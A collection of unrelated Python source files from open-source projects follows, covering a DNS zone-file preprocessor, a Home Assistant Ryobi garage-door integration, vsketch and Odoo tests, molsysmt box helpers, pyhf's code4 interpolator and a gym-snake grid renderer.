:param directory: The path to store the preprocessor outputs
:param zone_path: The path to the zone file
:param cid: The unique id for the container
:param new: Whether to load the input zone file in a new container
or reuse the existing container
"""
outputs = {}
origin = ''
tag = ':oct'
if input_args.latest:
tag = ':latest'
with open(zone_path, 'r') as zone_fp:
for line in zone_fp:
if 'SOA' in line:
origin = line.split('\t')[0]
if ' ' in origin:
origin = line.split()[0]
if not origin:
print(f'{datetime.now()}\tSkipping {zone_path.stem} as no SOA is found')
return False
port_mappings = get_ports(input_args)
for impl, (check, port) in port_mappings.items():
if check:
if impl == 'bind':
outputs["Bind"] = {}
outputs["Bind"]["Code"], outputs["Bind"]["Output"] = bind(
zone_path, origin, cid, new, port, tag)
elif impl == 'nsd':
outputs["Nsd"] = {}
outputs["Nsd"]["Code"], outputs["Nsd"]["Output"] = nsd(
zone_path, origin, cid, new, port, tag)
elif impl == 'knot':
outputs["Knot"] = {}
outputs["Knot"]["Code"], outputs["Knot"]["Output"] = knot(
zone_path, origin, cid, new, port, tag)
elif impl == 'powerdns':
outputs["Powerdns"] = {}
outputs["Powerdns"]["Code"], outputs["Powerdns"]["Output"] = powerdns(
zone_path, origin, cid, new, port, tag)
with open(directory / PREPROCESSOR_DIRECTORY / (zone_path.stem + '.json'), 'w') as output_fp:
json.dump(outputs, output_fp, indent=2)
return True
def preprocessor_check_helper(input_args: Namespace, input_dir: pathlib.Path) -> None:
"""
Helper function to check (invalid) zone files with implementations' preprocessors.
Iterates recursively over the input directory to find ZoneFiles directory and
calls check_zone_with_preprocessors function to check a zone file.
:param input_args: The input arguments
:param input_dir: The path to the parent directory with ZoneFiles directory.
"""
# Exit if the inputted path does not exist or is not a directory.
if not (input_dir.exists() or input_dir.is_dir()):
return
input_zone_files_dir = input_dir / 'ZoneFiles/'
output_zone_file_dir = input_dir / PREPROCESSOR_DIRECTORY
if input_zone_files_dir.exists() and input_zone_files_dir.is_dir():
output_zone_file_dir.mkdir(parents=True, exist_ok=True)
new_container = False
print(
f'{datetime.now()}\tStarted checking the zone files in {input_zone_files_dir}')
start = time.time()
for zone_path in input_zone_files_dir.iterdir():
if not zone_path.is_file():
continue
new_container = check_zone_with_preprocessors(
input_args, input_dir, zone_path, str(input_args.id), not new_container)
print(f'{datetime.now()}\tFinished checking the zone files in'
f'{input_zone_files_dir} in {time.time() - start}')
else:
if input_dir.is_dir():
for subdir in input_dir.iterdir():
preprocessor_check_helper(input_args, subdir)
if __name__ == '__main__':
parser = ArgumentParser(formatter_class=ArgumentDefaultsHelpFormatter,
description='Run zone preprocessors on (invalid) zone files')
parser.add_argument('-path', metavar='DIRECTORY_PATH', default=SUPPRESS,
help='The path to the directory containing ZoneFiles; '
'looks for ZoneFiles directory recursively'
'(default: Results/InvalidZoneFileTests/)')
parser.add_argument('-id', type=int, default=1, choices=range(1, 6),
help='Unique id for all the containers')
parser.add_argument('-b', help='Disable Bind.', action="store_true")
parser.add_argument('-n', help='Disable Nsd.', action="store_true")
parser.add_argument('-k', help='Disable Knot.', action="store_true")
parser.add_argument('-p', help='Disable PowerDns.', action="store_true")
parser.add_argument(
'-l', '--latest', help='Test using latest image tag.', action="store_true")
args = parser.parse_args()
if "path" in args:
dir_path = pathlib.Path(args.path)
else:
dir_path = pathlib.Path("Results/InvalidZoneFileTests/")
if dir_path.exists():
preprocessor_check_helper(args, dir_path)
else:
print(f'The input path {dir_path} does not exist.')
| 2.828125 | 3 |
homeassistant/components/cover/ryobi_gdo.py | don66/home-assistant | 7 | 12757400 | <reponame>don66/home-assistant
"""
Ryobi platform for the cover component.
For more details about this platform, please refer to the documentation
https://home-assistant.io/components/cover.ryobi_gdo/
"""
import logging
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.cover import (
CoverDevice, PLATFORM_SCHEMA, SUPPORT_OPEN, SUPPORT_CLOSE)
from homeassistant.const import (
CONF_USERNAME, CONF_PASSWORD, STATE_UNKNOWN, STATE_CLOSED)
REQUIREMENTS = ['py_ryobi_gdo==0.0.10']
_LOGGER = logging.getLogger(__name__)
CONF_DEVICE_ID = 'device_id'
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_DEVICE_ID): vol.All(cv.ensure_list, [cv.string]),
vol.Required(CONF_PASSWORD): cv.string,
vol.Required(CONF_USERNAME): cv.string,
})
SUPPORTED_FEATURES = (SUPPORT_OPEN | SUPPORT_CLOSE)
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the Ryobi covers."""
from py_ryobi_gdo import RyobiGDO as ryobi_door
covers = []
username = config.get(CONF_USERNAME)
password = config.get(CONF_PASSWORD)
devices = config.get(CONF_DEVICE_ID)
for device_id in devices:
my_door = ryobi_door(username, password, device_id)
_LOGGER.debug("Getting the API key")
if my_door.get_api_key() is False:
_LOGGER.error("Wrong credentials, no API key retrieved")
return
_LOGGER.debug("Checking if the device ID is present")
if my_door.check_device_id() is False:
_LOGGER.error("%s not in your device list", device_id)
return
_LOGGER.debug("Adding device %s to covers", device_id)
covers.append(RyobiCover(hass, my_door))
if covers:
_LOGGER.debug("Adding covers")
add_devices(covers, True)
class RyobiCover(CoverDevice):
"""Representation of a ryobi cover."""
def __init__(self, hass, ryobi_door):
"""Initialize the cover."""
self.ryobi_door = ryobi_door
self._name = 'ryobi_gdo_{}'.format(ryobi_door.get_device_id())
self._door_state = None
@property
def name(self):
"""Return the name of the cover."""
return self._name
@property
def is_closed(self):
"""Return if the cover is closed."""
if self._door_state == STATE_UNKNOWN:
return False
return self._door_state == STATE_CLOSED
@property
def device_class(self):
"""Return the class of this device, from component DEVICE_CLASSES."""
return 'garage'
@property
def supported_features(self):
"""Flag supported features."""
return SUPPORTED_FEATURES
def close_cover(self, **kwargs):
"""Close the cover."""
_LOGGER.debug("Closing garage door")
self.ryobi_door.close_device()
def open_cover(self, **kwargs):
"""Open the cover."""
_LOGGER.debug("Opening garage door")
self.ryobi_door.open_device()
def update(self):
"""Update status from the door."""
_LOGGER.debug("Updating RyobiGDO status")
self.ryobi_door.update()
self._door_state = self.ryobi_door.get_door_status()
| 1.992188 | 2 |
tests/test_transforms.py | blrm/vsketch | 0 | 12757401 | <reponame>blrm/vsketch
import numpy as np
import pytest
from .utils import bounds_equal, line_count_equal, line_exists
POLYGON = np.array([0, 1, 3 + 1j, 4 - 2j])
@pytest.mark.parametrize(
["scale", "expected"],
[
[(1, 1), POLYGON],
[(2, 2), 2 * POLYGON],
[(2, None), 2 * POLYGON],
[(2, 3), 2 * POLYGON.real + 3j * POLYGON.imag],
[("in", None), 96.0 * POLYGON],
[("2in", 3), 2 * 96 * POLYGON.real + 3j * POLYGON.imag],
],
)
def test_scale(vsk, scale, expected):
vsk.scale(*scale)
vsk.polygon(POLYGON.real, POLYGON.imag)
assert line_count_equal(vsk, 1)
# noinspection PyTypeChecker
assert line_exists(vsk, expected)
def test_scale_no_y(vsk):
vsk.scale(2)
vsk.polygon(POLYGON.real, POLYGON.imag)
assert line_count_equal(vsk, 1)
assert line_exists(vsk, 2 * POLYGON)
def test_translate(vsk):
vsk.translate(12, 23)
vsk.polygon(POLYGON.real, POLYGON.imag)
assert line_count_equal(vsk, 1)
assert line_exists(vsk, POLYGON + 12 + 23j)
def test_rotate_radians(vsk):
vsk.rotate(np.pi / 2)
vsk.rect(5, 0, 1, 2)
assert line_count_equal(vsk, 1)
assert bounds_equal(vsk, -2, 5, 0, 6)
def test_rotate_deg_rad(vsk):
vsk.rotate(np.pi / 2)
vsk.rotate(-90, degrees=True)
vsk.polygon(POLYGON.real, POLYGON.imag)
assert line_count_equal(vsk, 1)
assert line_exists(vsk, POLYGON)
def test_resetMatrix(vsk):
vsk.scale(10, 2)
vsk.resetMatrix()
vsk.polygon(POLYGON.real, POLYGON.imag)
assert line_count_equal(vsk, 1)
assert line_exists(vsk, POLYGON)
def test_pushMatrix(vsk):
vsk.pushMatrix()
vsk.scale(100, 200)
vsk.rotate(34)
vsk.popMatrix()
vsk.polygon(POLYGON.real, POLYGON.imag)
assert line_count_equal(vsk, 1)
assert line_exists(vsk, POLYGON)
def test_pushMatrix_context(vsk):
with vsk.pushMatrix():
vsk.scale(100, 200)
vsk.rotate(34)
vsk.polygon(POLYGON.real, POLYGON.imag)
assert line_count_equal(vsk, 1)
assert line_exists(vsk, POLYGON)
| 2.171875 | 2 |
odoo-13.0/addons/test_website/tests/test_reset_views.py | VaibhavBhujade/Blockchain-ERP-interoperability | 0 | 12757402 | # Part of Odoo. See LICENSE file for full copyright and licensing details.
import re
import odoo.tests
from odoo.tools import mute_logger
def break_view(view, fr='<p>placeholder</p>', to='<p t-field="not.exist"/>'):
view.arch = view.arch.replace(fr, to)
@odoo.tests.common.tagged('post_install', '-at_install')
class TestWebsiteResetViews(odoo.tests.HttpCase):
def fix_it(self, page, mode='soft'):
self.authenticate("admin", "admin")
resp = self.url_open(page)
self.assertEqual(resp.status_code, 500, "Waiting 500")
self.assertTrue('<button data-mode="soft" class="reset_templates_button' in resp.text)
data = {'view_id': self.find_template(resp), 'redirect': page, 'mode': mode}
resp = self.url_open('/website/reset_template', data)
self.assertEqual(resp.status_code, 200, "Waiting 200")
def find_template(self, response):
find = re.search(r'<input.*type="hidden".*name="view_id".*value="([0-9]+)?"', response.text)
return find and find.group(1)
def setUp(self):
super(TestWebsiteResetViews, self).setUp()
self.Website = self.env['website']
self.View = self.env['ir.ui.view']
self.test_view = self.Website.viewref('test_website.test_view')
@mute_logger('odoo.addons.http_routing.models.ir_http')
def test_01_reset_specific_page_view(self):
self.test_page_view = self.Website.viewref('test_website.test_page_view')
total_views = self.View.search_count([('type', '=', 'qweb')])
# Trigger COW then break the QWEB XML on it
break_view(self.test_page_view.with_context(website_id=1))
self.assertEqual(total_views + 1, self.View.search_count([('type', '=', 'qweb')]), "Missing COW view")
self.fix_it('/test_page_view')
@mute_logger('odoo.addons.http_routing.models.ir_http')
def test_02_reset_specific_view_controller(self):
total_views = self.View.search_count([('type', '=', 'qweb')])
# Trigger COW then break the QWEB XML on it
# `t-att-data="not.exist"` will test the case where exception.html contains branding
break_view(self.test_view.with_context(website_id=1), to='<p t-att-data="not.exist" />')
self.assertEqual(total_views + 1, self.View.search_count([('type', '=', 'qweb')]), "Missing COW view")
self.fix_it('/test_view')
@mute_logger('odoo.addons.http_routing.models.ir_http')
def test_03_reset_specific_view_controller_t_called(self):
self.test_view_to_be_t_called = self.Website.viewref('test_website.test_view_to_be_t_called')
total_views = self.View.search_count([('type', '=', 'qweb')])
# Trigger COW then break the QWEB XML on it
break_view(self.test_view_to_be_t_called.with_context(website_id=1))
break_view(self.test_view, to='<t t-call="test_website.test_view_to_be_t_called"/>')
self.assertEqual(total_views + 1, self.View.search_count([('type', '=', 'qweb')]), "Missing COW view")
self.fix_it('/test_view')
@mute_logger('odoo.addons.http_routing.models.ir_http')
def test_04_reset_specific_view_controller_inherit(self):
self.test_view_child_broken = self.Website.viewref('test_website.test_view_child_broken')
# Activate and break the inherited view
self.test_view_child_broken.active = True
break_view(self.test_view_child_broken.with_context(website_id=1, load_all_views=True))
self.fix_it('/test_view')
# This test work in real life, but not in test mode since we cannot rollback savepoint.
# @mute_logger('odoo.addons.http_routing.models.ir_http', 'odoo.addons.website.models.ir_ui_view')
# def test_05_reset_specific_view_controller_broken_request(self):
# total_views = self.View.search_count([('type', '=', 'qweb')])
# # Trigger COW then break the QWEB XML on it
# break_view(self.test_view.with_context(website_id=1), to='<t t-esc="request.env[\'website\'].browse(\'a\').name" />')
# self.assertEqual(total_views + 1, self.View.search_count([('type', '=', 'qweb')]), "Missing COW view (1)")
# self.fix_it('/test_view')
# also mute ir.ui.view as `get_view_id()` will raise "Could not find view object with xml_id 'not.exist'""
@mute_logger('odoo.addons.http_routing.models.ir_http', 'odoo.addons.website.models.ir_ui_view')
def test_06_reset_specific_view_controller_inexisting_template(self):
total_views = self.View.search_count([('type', '=', 'qweb')])
# Trigger COW then break the QWEB XML on it
break_view(self.test_view.with_context(website_id=1), to='<t t-call="not.exist"/>')
self.assertEqual(total_views + 1, self.View.search_count([('type', '=', 'qweb')]), "Missing COW view (2)")
self.fix_it('/test_view')
@mute_logger('odoo.addons.http_routing.models.ir_http')
def test_07_reset_page_view_complete_flow(self):
self.start_tour("/", 'test_reset_page_view_complete_flow_part1', login="admin")
self.fix_it('/test_page_view')
self.start_tour("/", 'test_reset_page_view_complete_flow_part2', login="admin")
self.fix_it('/test_page_view')
@mute_logger('odoo.addons.http_routing.models.ir_http')
def test_08_reset_specific_page_view_hard_mode(self):
self.test_page_view = self.Website.viewref('test_website.test_page_view')
total_views = self.View.search_count([('type', '=', 'qweb')])
# Trigger COW then break the QWEB XML on it
break_view(self.test_page_view.with_context(website_id=1))
# Break it again to have a previous arch different than file arch
break_view(self.test_page_view.with_context(website_id=1))
self.assertEqual(total_views + 1, self.View.search_count([('type', '=', 'qweb')]), "Missing COW view")
with self.assertRaises(AssertionError):
# soft reset should not be able to reset the view as previous
# version is also broken
self.fix_it('/test_page_view')
self.fix_it('/test_page_view', 'hard')
| 2.015625 | 2 |
molsysmt/_private/digestion/box.py | uibcdf/MolModMTs | 0 | 12757403 | import numpy as np
from molsysmt import puw
from ..exceptions import *
def digest_box(box):
return box
def digest_box_lengths_value(box_lengths):
output = None
if type(box_lengths) is not np.ndarray:
box_lengths = np.array(box_lengths)
shape = box_lengths.shape
if len(shape)==1:
if shape[0]==3:
output = np.expand_dims(box_lengths, axis=0)
else:
raise ValueError('box_lengths array with has not the correct shape.')
elif len(shape)==2:
if shape[1]==3:
output = box_lengths
else:
raise ValueError('box_lengths array with has not the correct shape.')
else:
raise ValueError('box_lengths array with has not the correct shape.')
return output
def digest_box_lengths(box_lengths):
output = None
unit = puw.get_unit(box_lengths)
box_lengths_value = puw.get_value(box_lengths)
box_lengths_value = digest_box_lengths_value(box_lengths_value)
output = box_lengths_value*unit
return output
def digest_box_angles_value(box_angles):
output = None
if type(box_angles) is not np.ndarray:
box_angles = np.array(box_angles)
shape = box_angles.shape
if len(shape)==1:
if shape[0]==3:
output = np.expand_dims(box_angles, axis=0)
else:
raise ValueError('box_angles array with has not the correct shape.')
elif len(shape)==2:
if shape[1]==3:
output = box_angles
else:
raise ValueError('box_angles array with has not the correct shape.')
else:
raise ValueError('box_angles array with has not the correct shape.')
return output
def digest_box_angles(box_angles):
output = None
unit = puw.get_unit(box_angles)
box_angles_value = puw.get_value(box_angles)
box_angles_value = digest_box_angles_value(box_angles_value)
output = box_angles_value*unit
return output
| 2.59375 | 3 |
src/pyhf/interpolators/code4.py | alexander-held/pyhf | 0 | 12757404 | <gh_stars>0
"""Polynomial Interpolation (Code 4)."""
import logging
import math
import pyhf
from pyhf.tensor.manager import get_backend
from pyhf import events
from pyhf.interpolators import _slow_interpolator_looper
log = logging.getLogger(__name__)
class code4:
r"""
The polynomial interpolation and exponential extrapolation strategy.
.. math::
\sigma_{sb} (\vec{\alpha}) = \sigma_{sb}^0(\vec{\alpha}) \underbrace{\prod_{p \in \text{Syst}} I_\text{poly|exp.} (\alpha_p; \sigma_{sb}^0, \sigma_{psb}^+, \sigma_{psb}^-, \alpha_0)}_\text{factors to calculate}
with
.. math::
I_\text{poly|exp.}(\alpha; I^0, I^+, I^-, \alpha_0) = \begin{cases} \left(\frac{I^+}{I^0}\right)^{\alpha} \qquad \alpha \geq \alpha_0\\ 1 + \sum_{i=1}^6 a_i \alpha^i \qquad |\alpha| < \alpha_0 \\ \left(\frac{I^-}{I^0}\right)^{-\alpha} \qquad \alpha < -\alpha_0 \end{cases}
and the :math:`a_i` are fixed by the boundary conditions
.. math::
\sigma_{sb}(\alpha=\pm\alpha_0), \left.\frac{\mathrm{d}\sigma_{sb}}{\mathrm{d}\alpha}\right|_{\alpha=\pm\alpha_0}, \mathrm{ and } \left.\frac{\mathrm{d}^2\sigma_{sb}}{\mathrm{d}\alpha^2}\right|_{\alpha=\pm\alpha_0}.
Namely that :math:`\sigma_{sb}(\vec{\alpha})` is continuous, and its first- and second-order derivatives are continuous as well.
"""
def __init__(self, histogramssets, subscribe=True, alpha0=1):
"""Polynomial Interpolation."""
default_backend = pyhf.default_backend
# alpha0 is assumed to be positive and non-zero. If alpha0 == 0, then
# we cannot calculate the coefficients (e.g. determinant == 0)
assert alpha0 > 0
self.__alpha0 = alpha0
self._histogramssets = default_backend.astensor(histogramssets)
# initial shape will be (nsysts, 1)
self.alphasets_shape = (self._histogramssets.shape[0], 1)
# precompute terms that only depend on the histogramssets
self._deltas_up = default_backend.divide(
self._histogramssets[:, :, 2], self._histogramssets[:, :, 1]
)
self._deltas_dn = default_backend.divide(
self._histogramssets[:, :, 0], self._histogramssets[:, :, 1]
)
self._broadcast_helper = default_backend.ones(
default_backend.shape(self._deltas_up)
)
self._alpha0 = self._broadcast_helper * self.__alpha0
deltas_up_alpha0 = default_backend.power(self._deltas_up, self._alpha0)
deltas_dn_alpha0 = default_backend.power(self._deltas_dn, self._alpha0)
# x = A^{-1} b
A_inverse = default_backend.astensor(
[
[
15.0 / (16 * alpha0),
-15.0 / (16 * alpha0),
-7.0 / 16.0,
-7.0 / 16.0,
1.0 / 16 * alpha0,
-1.0 / 16.0 * alpha0,
],
[
3.0 / (2 * math.pow(alpha0, 2)),
3.0 / (2 * math.pow(alpha0, 2)),
-9.0 / (16 * alpha0),
9.0 / (16 * alpha0),
1.0 / 16,
1.0 / 16,
],
[
-5.0 / (8 * math.pow(alpha0, 3)),
5.0 / (8 * math.pow(alpha0, 3)),
5.0 / (8 * math.pow(alpha0, 2)),
5.0 / (8 * math.pow(alpha0, 2)),
-1.0 / (8 * alpha0),
1.0 / (8 * alpha0),
],
[
3.0 / (-2 * math.pow(alpha0, 4)),
3.0 / (-2 * math.pow(alpha0, 4)),
-7.0 / (-8 * math.pow(alpha0, 3)),
7.0 / (-8 * math.pow(alpha0, 3)),
-1.0 / (8 * math.pow(alpha0, 2)),
-1.0 / (8 * math.pow(alpha0, 2)),
],
[
3.0 / (16 * math.pow(alpha0, 5)),
-3.0 / (16 * math.pow(alpha0, 5)),
-3.0 / (16 * math.pow(alpha0, 4)),
-3.0 / (16 * math.pow(alpha0, 4)),
1.0 / (16 * math.pow(alpha0, 3)),
-1.0 / (16 * math.pow(alpha0, 3)),
],
[
1.0 / (2 * math.pow(alpha0, 6)),
1.0 / (2 * math.pow(alpha0, 6)),
-5.0 / (16 * math.pow(alpha0, 5)),
5.0 / (16 * math.pow(alpha0, 5)),
1.0 / (16 * math.pow(alpha0, 4)),
1.0 / (16 * math.pow(alpha0, 4)),
],
]
)
b = default_backend.stack(
[
deltas_up_alpha0 - self._broadcast_helper,
deltas_dn_alpha0 - self._broadcast_helper,
default_backend.log(self._deltas_up) * deltas_up_alpha0,
-default_backend.log(self._deltas_dn) * deltas_dn_alpha0,
default_backend.power(default_backend.log(self._deltas_up), 2)
* deltas_up_alpha0,
default_backend.power(default_backend.log(self._deltas_dn), 2)
* deltas_dn_alpha0,
]
)
self._coefficients = default_backend.einsum(
'rc,shb,cshb->rshb', A_inverse, self._broadcast_helper, b
)
self._precompute()
if subscribe:
events.subscribe('tensorlib_changed')(self._precompute)
def _precompute(self):
tensorlib, _ = get_backend()
self.deltas_up = tensorlib.astensor(self._deltas_up)
self.deltas_dn = tensorlib.astensor(self._deltas_dn)
self.broadcast_helper = tensorlib.astensor(self._broadcast_helper)
self.alpha0 = tensorlib.astensor(self._alpha0)
self.coefficients = tensorlib.astensor(self._coefficients)
self.bases_up = tensorlib.einsum(
'sa,shb->shab', tensorlib.ones(self.alphasets_shape), self.deltas_up
)
self.bases_dn = tensorlib.einsum(
'sa,shb->shab', tensorlib.ones(self.alphasets_shape), self.deltas_dn
)
self.mask_on = tensorlib.ones(self.alphasets_shape)
self.mask_off = tensorlib.zeros(self.alphasets_shape)
self.ones = tensorlib.einsum(
'sa,shb->shab', self.mask_on, self.broadcast_helper
)
def _precompute_alphasets(self, alphasets_shape):
if alphasets_shape == self.alphasets_shape:
return
tensorlib, _ = get_backend()
self.alphasets_shape = alphasets_shape
self.bases_up = tensorlib.einsum(
'sa,shb->shab', tensorlib.ones(self.alphasets_shape), self.deltas_up
)
self.bases_dn = tensorlib.einsum(
'sa,shb->shab', tensorlib.ones(self.alphasets_shape), self.deltas_dn
)
self.mask_on = tensorlib.ones(self.alphasets_shape)
self.mask_off = tensorlib.zeros(self.alphasets_shape)
self.ones = tensorlib.einsum(
'sa,shb->shab', self.mask_on, self.broadcast_helper
)
return
def __call__(self, alphasets):
"""Compute Interpolated Values."""
tensorlib, _ = get_backend()
self._precompute_alphasets(tensorlib.shape(alphasets))
# select where alpha >= alpha0 and produce the mask
where_alphasets_gtalpha0 = tensorlib.where(
alphasets >= self.__alpha0, self.mask_on, self.mask_off
)
masks_gtalpha0 = tensorlib.astensor(
tensorlib.einsum(
'sa,shb->shab', where_alphasets_gtalpha0, self.broadcast_helper
),
dtype="bool",
)
# select where alpha > -alpha0 ["not(alpha <= -alpha0)"] and produce the mask
where_alphasets_not_ltalpha0 = tensorlib.where(
alphasets > -self.__alpha0, self.mask_on, self.mask_off
)
masks_not_ltalpha0 = tensorlib.astensor(
tensorlib.einsum(
'sa,shb->shab', where_alphasets_not_ltalpha0, self.broadcast_helper
),
dtype="bool",
)
# s: set under consideration (i.e. the modifier)
# a: alpha variation
# h: histogram affected by modifier
# b: bin of histogram
exponents = tensorlib.einsum(
'sa,shb->shab', tensorlib.abs(alphasets), self.broadcast_helper
)
# for |alpha| >= alpha0, we want to raise the bases to the exponent=alpha
# and for |alpha| < alpha0, we want to raise the bases to the exponent=1
masked_exponents = tensorlib.where(
exponents >= self.__alpha0, exponents, self.ones
)
# we need to produce the terms of alpha^i for summing up
alphasets_powers = tensorlib.stack(
[
alphasets,
tensorlib.power(alphasets, 2),
tensorlib.power(alphasets, 3),
tensorlib.power(alphasets, 4),
tensorlib.power(alphasets, 5),
tensorlib.power(alphasets, 6),
]
)
# this is the 1 + sum_i a_i alpha^i
value_btwn = tensorlib.ones(exponents.shape) + tensorlib.einsum(
'rshb,rsa->shab', self.coefficients, alphasets_powers
)
# first, build a result where:
# alpha > alpha0 : fill with bases_up
# not(alpha > alpha0) : fill with 1 + sum(a_i alpha^i)
results_gtalpha0_btwn = tensorlib.where(
masks_gtalpha0, self.bases_up, value_btwn
)
# then, build a result where:
# alpha >= -alpha0 : do nothing (fill with previous result)
# not(alpha >= -alpha0): fill with bases_dn
bases = tensorlib.where(
masks_not_ltalpha0, results_gtalpha0_btwn, self.bases_dn
)
return tensorlib.power(bases, masked_exponents)
class _slow_code4:
"""
Reference Implementation of Code 4.
delta_up^alpha0 = 1 + a1 alpha0 + a2 alpha0^2 + a3 alpha0^3 + a4 alpha0^4 + a5 alpha0^5 + a6 alpha0^6
delta_down^alpha0 = 1 - a1 alpha0 + a2 alpha0^2 - a3 alpha0^3 + a4 alpha0^4 - a5 alpha0^5 + a6 alpha0^6
f[alpha_] := 1 + a1 * alpha + a2 * alpha^2 + a3 * alpha^3 + a4 * alpha^4 + a5 * alpha^5 + a6 * alpha^6
up[alpha_] := delta_up^alpha
down[alpha_] := delta_down^(-alpha)
We want to find the coefficients a1, a2, a3, a4, a5, a6 by solving:
f[alpha0] == up[alpha0]
f[-alpha0] == down[-alpha0]
f'[alpha0] == up'[alpha0]
f'[-alpha0] == down'[-alpha0]
f''[alpha0] == up''[alpha0]
f''[-alpha0] == down''[-alpha0]
Treating this as multiplication with a rank-6 matrix A: A*x = b, where x = [a1, a2, a3, a4, a5, a6]
[alpha0, alpha0^2, alpha0^3, alpha0^4, alpha0^5, alpha0^6 ] [a1] = [ delta_up^(alpha0) - 1 ]
[-alpha0, alpha0^2, -alpha0^3, alpha0^4, -alpha0^5, alpha0^6 ] [a2] = [ delta_down^(alpha0) - 1 ]
[1, 2alpha0, 3alpha0^2, 4alpha0^3, 5alpha0^4, 6alpha0^5 ] [a3] = [ ln(delta_up) delta_up^(alpha0) ]
[1, -2alpha0, 3alpha0^2, -4alpha0^3, 5alpha0^4, -6alpha0^5] [a4] = [ - ln(delta_down) delta_down^(alpha0) ]
[0, 2, 6alpha0, 12alpha0^2, 20alpha0^3, 30alpha0^4] [a5] = [ ln(delta_up)^2 delta_up^(alpha0) ]
[0, 2, -6alpha0, 12alpha0^2, -20alpha0^3, 30alpha0^4] [a6] = [ ln(delta_down)^2 delta_down^(alpha0) ]
The determinant of this matrix is -2048*alpha0^15. The trace is 30*alpha0^4+16*alpha0^3+4*alpha0^2+alpha0. Therefore, this matrix is invertible if and only if alpha0 != 0.
The inverse of this matrix is (and verifying with http://wims.unice.fr/~wims/wims.cgi)
[15/(16*alpha0), -15/(16*alpha0), -7/16, -7/16, 1/16*alpha0, -1/16*alpha0 ]
[3/(2*alpha0^2), 3/(2*alpha0^2), -9/(16*alpha0), 9/(16*alpha0), 1/16, 1/16 ]
[-5/(8*alpha0^3), 5/(8*alpha0^3), 5/(8*alpha0^2), 5/(8*alpha0^2), -1/(8*alpha0), 1/(8*alpha0) ]
[3/(-2*alpha0^4), 3/(-2*alpha0^4), -7/(-8*alpha0^3), 7/(-8*alpha0^3), -1/(8*alpha0^2), -1/(8*alpha0^2) ]
[3/(16*alpha0^5), -3/(16*alpha0^5), -3/(16*alpha0^4), -3/(16*alpha0^4), 1/(16*alpha0^3), -1/(16*alpha0^3)]
[1/(2*alpha0^6), 1/(2*alpha0^6), -5/(16*alpha0^5), 5/(16*alpha0^5), 1/(16*alpha0^4), 1/(16*alpha0^4) ]
"""
def product(self, down, nom, up, alpha):
delta_up = up / nom
delta_down = down / nom
if alpha >= self.alpha0:
delta = math.pow(delta_up, alpha)
elif -self.alpha0 < alpha < self.alpha0:
delta_up_alpha0 = math.pow(delta_up, self.alpha0)
delta_down_alpha0 = math.pow(delta_down, self.alpha0)
b = [
delta_up_alpha0 - 1,
delta_down_alpha0 - 1,
math.log(delta_up) * delta_up_alpha0,
-math.log(delta_down) * delta_down_alpha0,
math.pow(math.log(delta_up), 2) * delta_up_alpha0,
math.pow(math.log(delta_down), 2) * delta_down_alpha0,
]
A_inverse = [
[
15.0 / (16 * self.alpha0),
-15.0 / (16 * self.alpha0),
-7.0 / 16.0,
-7.0 / 16.0,
1.0 / 16 * self.alpha0,
-1.0 / 16.0 * self.alpha0,
],
[
3.0 / (2 * math.pow(self.alpha0, 2)),
3.0 / (2 * math.pow(self.alpha0, 2)),
-9.0 / (16 * self.alpha0),
9.0 / (16 * self.alpha0),
1.0 / 16,
1.0 / 16,
],
[
-5.0 / (8 * math.pow(self.alpha0, 3)),
5.0 / (8 * math.pow(self.alpha0, 3)),
5.0 / (8 * math.pow(self.alpha0, 2)),
5.0 / (8 * math.pow(self.alpha0, 2)),
-1.0 / (8 * self.alpha0),
1.0 / (8 * self.alpha0),
],
[
3.0 / (-2 * math.pow(self.alpha0, 4)),
3.0 / (-2 * math.pow(self.alpha0, 4)),
-7.0 / (-8 * math.pow(self.alpha0, 3)),
7.0 / (-8 * math.pow(self.alpha0, 3)),
-1.0 / (8 * math.pow(self.alpha0, 2)),
-1.0 / (8 * math.pow(self.alpha0, 2)),
],
[
3.0 / (16 * math.pow(self.alpha0, 5)),
-3.0 / (16 * math.pow(self.alpha0, 5)),
-3.0 / (16 * math.pow(self.alpha0, 4)),
-3.0 / (16 * math.pow(self.alpha0, 4)),
1.0 / (16 * math.pow(self.alpha0, 3)),
-1.0 / (16 * math.pow(self.alpha0, 3)),
],
[
1.0 / (2 * math.pow(self.alpha0, 6)),
1.0 / (2 * math.pow(self.alpha0, 6)),
-5.0 / (16 * math.pow(self.alpha0, 5)),
5.0 / (16 * math.pow(self.alpha0, 5)),
1.0 / (16 * math.pow(self.alpha0, 4)),
1.0 / (16 * math.pow(self.alpha0, 4)),
],
]
coefficients = [
sum(A_i * b_j for A_i, b_j in zip(A_row, b)) for A_row in A_inverse
]
delta = 1
for i in range(1, 7):
delta += coefficients[i - 1] * math.pow(alpha, i)
else:
delta = math.pow(delta_down, (-alpha))
return delta
def __init__(self, histogramssets, subscribe=True, alpha0=1):
self._histogramssets = histogramssets
self.alpha0 = alpha0
def __call__(self, alphasets):
tensorlib, _ = get_backend()
return tensorlib.astensor(
_slow_interpolator_looper(
self._histogramssets, tensorlib.tolist(alphasets), self.product
)
)
| 2.25 | 2 |
gym_snake/envs/grid/square_grid.py | telmo-correa/gym-snake | 2 | 12757405 | from gym_snake.envs.constants import Action4, Direction4
from gym_snake.envs.grid.base_grid import BaseGrid
class SquareGrid(BaseGrid):
def __init__(self, *args, **kwargs):
super(SquareGrid, self).__init__(*args, **kwargs)
def get_forward_action(self):
return Action4.forward
def get_random_direction(self):
return Direction4(self.np_random.randint(0, len(Direction4)))
def get_renderer_dimensions(self, tile_size):
return self.width * tile_size, self.height * tile_size
def render(self, r, tile_size, cell_pixels):
r_width, r_height = self.get_renderer_dimensions(tile_size)
assert r.width == r_width
assert r.height == r_height
# Total grid size at native scale
width_px = self.width * cell_pixels
height_px = self.height * cell_pixels
r.push()
# Internally, we draw at the "large" full-grid resolution, but we
# use the renderer to scale back to the desired size
r.scale(tile_size / cell_pixels, tile_size / cell_pixels)
# Draw the background of the in-world cells black
r.fillRect(
0,
0,
width_px,
height_px,
0, 0, 0
)
# Draw grid lines
r.setLineColor(100, 100, 100)
r.setLineWidth(cell_pixels / tile_size)
for rowIdx in range(0, self.height):
y = cell_pixels * rowIdx
r.drawLine(0, y, width_px, y)
for colIdx in range(0, self.width):
x = cell_pixels * colIdx
r.drawLine(x, 0, x, height_px)
# Render the objects
snake_cell_renderer = SquareGrid._square_cell_renderer(r, cell_pixels)
for snake in self.snakes:
snake.render(snake_cell_renderer)
